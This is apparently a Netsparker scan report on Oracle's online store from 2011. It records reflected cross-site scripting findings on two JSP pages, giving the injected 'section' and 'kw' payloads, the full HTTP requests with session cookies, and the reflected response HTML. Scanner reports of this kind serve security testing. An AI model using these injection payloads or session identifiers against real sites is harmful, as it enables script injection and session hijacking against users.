anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonTextSelected> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US">Shopping Cart</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=CARTS&sitex=10145:1298447:US">Carts</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCSldLists.jsp?sitex=10145:1298447:US">Shopping Lists</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCScdListControl.jsp?context=QUOTES&sitex=10145:1298447:US">Quotes</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x0014F4)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAc..
- /OA_HTML/misibeCCtdItemDetail.jsp

/OA_HTML/misibeCCtdItemDetail.jsp

https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0&section=%22..

Parameters

Parameter Type Value
item GET 899068
beginIndex GET 0
section GET "><net sparker=alert(0x0015B3)>
sitex GET 14405:1435532:US

Request

GET /OA_HTML/misibeCCtdItemDetail.jsp?item=899068&beginIndex=0§ion=%22%3E%3Cnet%20sparker=netsparker(0x0015B3)%3E&sitex=14405:1435532:US HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=899068§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Me0; GSI_pses=ZG763FC48B8260184EA05BC69BB328F558E51A9B83BEDDC3255613B1EAD0611515C8F9442687E12EFCAF30234D918E69A0; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=pznhGy0MSMTPVRxs9PdVRWWIRI
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=5ce64da47dd89b3ed8c945dc76ec4f0dcf1f85f89eba4704aad2f61ff27d9034.e34QbhaLa3mKbi0La3mQaNePax4Me0; path=/OA_HTML; secure
Content-Length: 9995
Date: Sun, 11 Sep 2011 18:04:59 GMT
































<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG7EF50ECB99484C9D89548F4830ED8B4DD08C6D22145E1F85&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ibeCCtdItemLeftBins.jsp 120.2 2005/11/16 ..
- /OA_HTML/ibeCZzpHome.jsp

/OA_HTML/ibeCZzpHome.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?minisite=10145&respid=1298447&grp=STORE&langua..

Parameters

Parameter Type Value
minisite GET 10145
respid GET 1298447
grp GET STORE
language GET US
GSI GET xw7XzrhVDfQxPPTRIpSLNd3Y2y
GSI_pses GET ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
cg GET -200
kw GET '" ns= alert(0x0018D0)

Request

GET /OA_HTML/ibeCZzpHome.jsp?minisite=10145&respid=1298447&grp=STORE&language=US&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5&cg=-200&kw=%27%22%20ns=%20netsparker(0x0018D0)%20 HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp?minisite=10145&respid=1298447&grp=STORE&language=US&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=c99d370b0ff8be8922dcfd2dcecadad8dd120a9c4d0ac50a22f178cc07f4ee36.e34QbhaLa3mKbi0La3mQaNePax4Le0; GSI_pses=ZG5244DFA246964D95BF9939BE19E4516998128F5DB48147A04A050AFCBA938946D3B8C0C9826333AAA8B0EDFE3BFD997E; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=jCBnOXPhLqZVidPNBxvT5K93L7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=c99d370b0ff8be8922dcfd2dcecadad8dd120a9c4d0ac50a22f178cc07f4ee36.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure,GSI_pses=ZG4653999CD1D4B3C25340380575CB582FAD68E32A1CF20539539F6EFAB95B4E70253422635692E9DBCE0F084742B4DEDB; expires=Thu, 10-Nov-2011 18:06:30 GMT; path=/OA_HTML
Content-Length: 7326
Date: Sun, 11 Sep 2011 18:06:29 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCCtdCmnSt.jsp






























<!-- $Header: ibeCCtdCmnSt.jsp 120.3.12010000.2 2009/03/02 06:30:51 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCWcpESIContainer.jsp 120.0 2005/05/30 03:10:04 appldev noship $ --><!-- $Header: ibeCWcpHeader.jsp 120.0 2005/05/30 02:24:25 appldev noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Welcome </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; 